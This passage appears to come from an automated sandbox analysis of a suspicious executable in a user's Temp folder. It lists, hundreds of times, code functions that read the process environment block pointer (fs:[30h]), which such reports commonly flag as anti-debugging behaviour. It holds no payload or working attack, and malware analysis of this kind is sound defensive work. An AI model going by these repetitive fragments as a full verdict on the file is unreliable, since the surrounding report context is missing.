          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B8E4 mov eax, dword ptr fs:[00000030h]3_2_00A1B8E4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F58EC mov eax, dword ptr fs:[00000030h]3_2_009F58EC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h]3_2_009F40E1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h]3_2_009F40E1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h]3_2_009F40E1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]3_2_00A0B02A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]3_2_00A0B02A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]3_2_00A0B02A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]3_2_00A0B02A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h]3_2_00A1A830
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h]3_2_00A1A830
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h]3_2_00A1A830
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h]3_2_00A1A830
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]3_2_00A77016
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]3_2_00A77016
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]3_2_00A77016
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]3_2_00AC4015
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]3_2_00AC4015
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2073 mov eax, dword ptr fs:[00000030h]3_2_00AB2073
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC1074 mov eax, dword ptr fs:[00000030h]3_2_00AC1074
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]3_2_00A10050
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]3_2_00A10050
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A769A6 mov eax, dword ptr fs:[00000030h]3_2_00A769A6
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]3_2_00A261A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]3_2_00A261A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h]3_2_00AB49A4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h]3_2_00AB49A4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h]3_2_00AB49A4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h]3_2_00AB49A4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]3_2_00A751BE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]3_2_00A751BE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]3_2_00A751BE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]3_2_00A751BE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1C182 mov eax, dword ptr fs:[00000030h]3_2_00A1C182
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A185 mov eax, dword ptr fs:[00000030h]3_2_00A2A185
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22990 mov eax, dword ptr fs:[00000030h]3_2_00A22990
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A841E8 mov eax, dword ptr fs:[00000030h]3_2_00A841E8
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]3_2_009FB1E1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]3_2_009FB1E1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]3_2_009FB1E1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov ecx, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]3_2_00A2513A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]3_2_00A2513A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]3_2_009F9100
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]3_2_009F9100
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]3_2_009F9100
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]3_2_00A1B944
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]3_2_00A1B944
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]3_2_009FB171
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]3_2_009FB171
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FC962 mov eax, dword ptr fs:[00000030h]3_2_009FC962
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A0AAB0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A0AAB0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2FAB0 mov eax, dword ptr fs:[00000030h]3_2_00A2FAB0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]3_2_00A2D294
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]3_2_00A2D294
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22AE4 mov eax, dword ptr fs:[00000030h]3_2_00A22AE4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22ACB mov eax, dword ptr fs:[00000030h]3_2_00A22ACB
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]3_2_009FAA16
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]3_2_009FAA16
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]3_2_00A34A2C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]3_2_00A34A2C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov ecx, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A08A0A mov eax, dword ptr fs:[00000030h]3_2_00A08A0A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A13A1C mov eax, dword ptr fs:[00000030h]3_2_00A13A1C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]3_2_00ABAA16
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]3_2_00ABAA16
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]3_2_00AAB260
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]3_2_00AAB260
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8A62 mov eax, dword ptr fs:[00000030h]3_2_00AC8A62
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3927A mov eax, dword ptr fs:[00000030h]3_2_00A3927A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABEA55 mov eax, dword ptr fs:[00000030h]3_2_00ABEA55
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A84257 mov eax, dword ptr fs:[00000030h]3_2_00A84257
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC5BA5 mov eax, dword ptr fs:[00000030h]3_2_00AC5BA5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]3_2_00A24BAD
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]3_2_00A24BAD
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]3_2_00A24BAD
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB138A mov eax, dword ptr fs:[00000030h]3_2_00AB138A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h]3_2_00A2138B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h]3_2_00A2138B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h]3_2_00A2138B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAD380 mov ecx, dword ptr fs:[00000030h]3_2_00AAD380
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]3_2_00A01B8F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]3_2_00A01B8F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2B390 mov eax, dword ptr fs:[00000030h]3_2_00A2B390
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22397 mov eax, dword ptr fs:[00000030h]3_2_00A22397
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1DBE9 mov eax, dword ptr fs:[00000030h]3_2_00A1DBE9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E3 mov ecx, dword ptr fs:[00000030h]3_2_00AA23E3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E3 mov ecx, dword ptr fs:[00000030h]3_2_00AA23E3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E3 mov eax, dword ptr fs:[00000030h]3_2_00AA23E3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]3_2_00A753CA
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]3_2_00A753CA
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB131B mov eax, dword ptr fs:[00000030h]3_2_00AB131B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FF358 mov eax, dword ptr fs:[00000030h]3_2_009FF358
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h]3_2_00A23B7A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h]3_2_00A23B7A
